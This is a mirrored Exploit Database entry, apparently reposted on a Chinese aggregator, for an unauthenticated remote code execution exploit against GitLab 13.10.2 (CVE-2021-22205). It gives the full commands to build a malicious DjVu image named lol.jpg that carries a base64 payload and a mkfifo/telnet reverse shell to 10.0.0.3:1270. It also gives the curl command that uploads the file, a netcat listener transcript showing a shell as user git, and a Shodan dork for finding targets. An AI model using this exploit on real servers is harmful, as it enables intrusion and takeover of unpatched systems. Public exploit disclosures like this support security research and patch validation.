GitLab 13.10.2 – Remote Code Execution (RCE) (Unauthenticated)

• Exploit Database
• 17 阅读

• 作者： Jacob Baines
  日期： 2021-11-17
• 类别：

  • webapps
  平台：

  • ruby
• 来源：https://www.exploit-db.com/exploits/50532/

• # Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)
  # Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22
  # Date: 11/01/2021
  # Exploit Author: Jacob Baines
  # Vendor Homepage: https://about.gitlab.com/
  # Software Link: https://gitlab.com/gitlab-org/gitlab
  # Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8
  # Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)
  # CVE : CVE-2021-22205
  # Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/
  # Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed
  
  Code execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it.
  
  1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270.
  
  echo -e
  "QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs="
  | base64 -d > lol.jpg
  echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg
  echo -n
  "fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg=="
  | base64 -d >> lol.jpg
  
  2. Sending the payload. Any random endpoint will do.
  
  curl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8)
  
  2a. Sample Output from the reverse shell:
  
  $ nc -lnvp 1270
  Listening on [0.0.0.0] (family 0, port 1270)
  Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport
  34836)
  whoami
  git
  id
  uid=998(git) gid=998(git) groups=998(git)